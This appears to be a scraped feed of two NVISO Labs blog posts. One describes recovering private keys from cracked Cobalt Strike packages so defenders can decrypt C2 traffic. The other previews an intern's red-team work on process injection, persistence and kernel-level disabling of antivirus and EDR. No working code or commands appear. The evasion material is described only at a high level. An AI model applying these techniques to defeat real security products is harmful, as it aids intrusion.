Sander (@cerbersec), the main author of this post, is a cyber security student with a passion for red teaming and malware development. He’s a two-time intern at NVISO and a future NVISO bird.

Jonas is NVISO’s red team lead and thus involved in all red team exercises, either from a project management perspective (non-technical), for the execution of fieldwork (technical), or a combination of both. You can find Jonas on LinkedIn.

Cobalt Strike: Using Known Private Keys To Decrypt Traffic – Part 1

21 October 2021 at 08:59

We found 6 private keys for rogue Cobalt Strike software, enabling C2 network traffic decryption.

The communication between a Cobalt Strike beacon (client) and a Cobalt Strike team server (C2) is encrypted with AES (even when it takes place over HTTPS). The AES key is generated by the beacon, and communicated to the C2 using an encrypted metadata blob (a cookie, by default).

RSA encryption is used to encrypt this metadata: the beacon has the public key of the C2, and the C2 has the private key.

Figure 1: C2 traffic

Public and private keys are stored in file .cobaltstrike.beacon_keys. These keys are generated when the Cobalt Strike team server software is used for the first time.

During our fingerprinting of Internet facing Cobalt Strike servers, we found public keys that are used by many different servers. This implies that they use the same private key, thus that their .cobaltstrike.beacon_keys file is shared.

One possible explanation we verified: are there cracked versions of Cobalt Strike, used by malicious actors, that include a .cobaltstrike.beacon_keys? This file is not part of a legitimate Cobalt Strike package, as it is generated at first time use.

Searching through VirusTotal, we found 10 cracked Cobalt Strike packages: ZIP files containing a file named .cobaltstrike.beacon_keys. Out of these 10 packages, we extracted 6 unique RSA key pairs.

2 of these pairs are prevalent on the Internet: 25% of the Cobalt Strike servers we fingerprinted (1500+) use one of these 2 key pairs.

This key information is now included in tool 1768.py, a tool developed by Didier Stevens to extract configurations of Cobalt Strike beacons.

Whenever a public key is extracted with known private key, the tool highlights this:

Figure 2: 1768.py extracting configuration from beacon

At minimum, this information is further confirmation that the sample came from a rogue Cobalt Strike server (and not a red team server).

Using option verbose, the private key is also displayed.

Figure 3: using option verbose to display the private key

This can then be used to decrypt the metadata, and the C2 traffic (more on this later).

Figure 4: decrypting metadata

In upcoming blog posts, we will show in detail how to use these private keys to decrypt metadata and decrypt C2 traffic.

About the authors
Didier Stevens is a malware expert working for NVISO. Didier is a SANS Internet Storm Center senior handler and Microsoft MVP, and has developed numerous popular tools to assist with malware analysis. You can find Didier on Twitter and LinkedIn.

You can follow NVISO Labs on Twitter to stay up to date on all our future research and publications.

All aboard the internship – whispering past defenses and sailing into kernel space

13 October 2021 at 12:25

Previously, we have already published Sander’s (@cerbersec) internship testimony. Since this post does not really contain any juicy technical details and Sander has done a terrific job putting together a walkthrough of his process, we thought it would be a waste not to highlight his previous posts again.

In Part 1, Sander explains how he started his journey and dove into process injection techniques, WIN32 API (hooking), userland vs kernel space, and Cobalt Strike’s Beacon Object Files (BOF).

Just being able to perform process injection using direct syscalls from a BOF did not signal the end of his journey yet, on the contrary. In Part 2, Sander extended our BOF arsenal with additional process injections techniques and persistence. With all this functionality bundled in an Agressor Script, CobaltWispers was born.

We are considering to open source this little framework, but some final tweaks would be required first, as explained in the part 2 blog post.

While this is the end (for now) of Sander’s BOF journey, we have another challenging topic lined up for him: The Kernel. Here’s a little sneak peek of the next blog series/walkthrough we will be releasing. Stay tuned!


KdPrint(“Hello, world!\n”);

When I finished my previous internship, which was focused on bypassing Endpoint Detection and Response (EDR) software and Anti-Virus (AV) software from a user land point of view, we joked around with the idea that the next topic would be defeating the same problem but from kernel land. At that point in time I had no experience at all with the Windows kernel and it all seemed very advanced and above my level of technical ability. As I write this blogpost, I have to admit it wasn’t as scary or difficult as I thought it to be. C/C++ is still C/C++ and assembly instructions are still headache-inducing, but comprehensible with the right resources and time dedication.

In this first post, I will lay out some of the technical concepts and ideas behind the goal of this internship, as well as reflect back on my first steps in successfully bypassing/disabling a reputable Anti-Virus product, but more on that later.


About the authors

Jonas is NVISO’s red team lead and thus involved in all red team exercises, either from a project management perspective (non-technical), for the execution of fieldwork (technical), or a combination of both. You can find Jonas on LinkedIn.
Sander is a cyber security student with a passion for red teaming and malware development. He’s a two-time intern at NVISO and a future NVISO bird.

❌